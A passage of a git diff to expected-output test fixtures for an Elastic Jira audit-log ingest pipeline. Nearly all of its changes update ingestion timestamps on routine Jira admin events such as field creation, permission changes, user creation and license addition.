end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5116,7 +5110,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:33.590433112Z", + "ingested": "2021-12-15T09:00:40.254688989Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.332Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5173,7 +5167,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590435735Z", + "ingested": "2021-12-15T09:00:40.254690166Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.313Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10104\",\"id\":\"customfield_10104\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Original story points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Original story points\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5242,7 +5236,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590438655Z", + "ingested": "2021-12-15T09:00:40.254691595Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.266Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target end\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target end\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5316,7 +5310,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590441306Z", + "ingested": "2021-12-15T09:00:40.254692795Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.224Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target start\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target start\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5390,7 +5384,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:33.590473824Z", + "ingested": "2021-12-15T09:00:40.254693984Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.990Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5447,7 +5441,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590476704Z", + "ingested": "2021-12-15T09:00:40.254695231Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.974Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Parent Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Parent Link\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5516,7 +5510,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590479359Z", + "ingested": "2021-12-15T09:00:40.254696677Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.318Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10100\",\"id\":\"customfield_10100\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Team\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Team\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5585,7 +5579,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590481971Z", + "ingested": "2021-12-15T09:00:40.254697851Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.162Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5659,7 +5653,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590484533Z", + "ingested": "2021-12-15T09:00:40.254699031Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.158Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"Manage Sprints\",\"to\":\"\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"Project Role\",\"to\":\"\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"Administrators\",\"to\":\"\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5733,7 +5727,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590487134Z", + "ingested": "2021-12-15T09:00:40.254700257Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.138Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5808,7 +5802,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:33.590489705Z", + "ingested": "2021-12-15T09:00:40.254701430Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.756Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -5883,7 +5877,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590492304Z", + "ingested": "2021-12-15T09:00:40.254702723Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.754Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5957,7 +5951,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590498251Z", + "ingested": "2021-12-15T09:00:40.254703910Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.752Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6031,7 +6025,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590500992Z", + "ingested": "2021-12-15T09:00:40.254705090Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.751Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6105,7 +6099,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590503575Z", + "ingested": "2021-12-15T09:00:40.254706268Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.750Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6180,7 +6174,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:33.590506117Z", + "ingested": "2021-12-15T09:00:40.254707485Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.734Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-administrators\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -6256,7 +6250,7 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-08T14:50:33.590508737Z", + "ingested": "2021-12-15T09:00:40.254708722Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.600Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Active / Inactive\",\"i18nKey\":\"admin.common.phrases.active.inactive\",\"to\":\"Active\"},{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"to\":\"test.user@example.com\"},{\"key\":\"Full name\",\"i18nKey\":\"common.words.fullname\",\"to\":\"Alex\"},{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -6350,7 +6344,7 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-08T14:50:33.590511380Z", + "ingested": "2021-12-15T09:00:40.254709965Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.596Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.system\",\"category\":\"system\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"action\":\"New license added\"},\"affectedObjects\":[{\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Date Purchased\",\"i18nKey\":\"admin.license.date.purchased\",\"to\":\"21/Nov/21\"},{\"key\":\"License Type\",\"i18nKey\":\"admin.license.type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"key\":\"Organization\",\"i18nKey\":\"admin.license.organisation\",\"to\":\"myself\"},{\"key\":\"Server ID\",\"i18nKey\":\"admin.server.id\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"key\":\"Support Entitlement Number (SEN)\",\"i18nKey\":\"admin.license.sen\",\"to\":\"SEN-L17782970\"},{\"key\":\"User Limit\",\"i18nKey\":\"admin.license.user.limit\",\"to\":\"Unlimited\"},{\"key\":\"jira-software\",\"i18nKey\":\"jira-software\",\"to\":\"-1\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6443,7 +6437,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590513947Z", + "ingested": "2021-12-15T09:00:40.254711161Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.584Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6517,7 +6511,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590516502Z", + "ingested": "2021-12-15T09:00:40.254712359Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.583Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6591,7 +6585,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590519051Z", + "ingested": "2021-12-15T09:00:40.254713579Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.581Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6665,7 +6659,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590521617Z", + "ingested": "2021-12-15T09:00:40.254714847Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.579Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-software-users\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6715,13 +6709,6 @@ } }, { - "source": { - "address": "10.50.33.72", - "ip": "10.50.33.72" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2021-11-22T00:05:08.514Z", "ecs": { "version": "1.12.0" @@ -6740,9 +6727,13 @@ "service": { "address": "http://jira.internal:8088" }, + "source": { + "address": "10.50.33.72", + "ip": "10.50.33.72" + }, "event": { "action": "jira.auditing.group.created", - "ingested": "2021-12-08T14:50:33.590524326Z", + "ingested": "2021-12-15T09:00:40.254716027Z", "original": "{\"timestamp\":\"2021-11-22T00:05:08.514Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.group.created\",\"action\":\"Group created\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -6757,6 +6748,9 @@ "name": "Anonymous", "id": "-2" }, + "tags": [ + "preserve_original_event" + ], "jira": { "audit": { "method": "Browser", @@ -6805,7 +6799,7 @@ }, "event": { "action": "jira.auditing.user.renamed", - "ingested": "2021-12-08T14:50:33.590575389Z", + "ingested": "2021-12-15T09:00:40.254717204Z", "original": "{\"timestamp\":\"2021-11-28T18:18:26.076Z\",\"author\":{\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.renamed\",\"action\":\"User renamed\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Username\",\"i18nKey\":\"common.words.username\",\"from\":\"admin.user\",\"to\":\"admin.user1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6876,7 +6870,7 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-08T14:50:33.590580391Z", + "ingested": "2021-12-15T09:00:40.254718429Z", "original": "{\"timestamp\":\"2021-11-28T18:23:20.278Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"from\":\"admin@example.com\",\"to\":\"admin1@example.com\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", @@ -6955,7 +6949,7 @@ }, "event": { "action": "jira.auditing.user.updated", - "ingested": "2021-12-08T14:50:33.590583039Z", + "ingested": "2021-12-15T09:00:40.254719604Z", "original": "{\"timestamp\":\"2021-11-28T18:23:13.741Z\",\"author\":{\"name\":\"admin.user1\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.updated\",\"action\":\"User updated\"},\"affectedObjects\":[{\"name\":\"admin.user1\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=admin.user1\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Full name\",\"i18nKey\":\"common.words.fullname\",\"from\":\"Admin User\",\"to\":\"Admin User1\"}],\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log index 1949ee04212..8f34ad7d186 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-files.log +++ 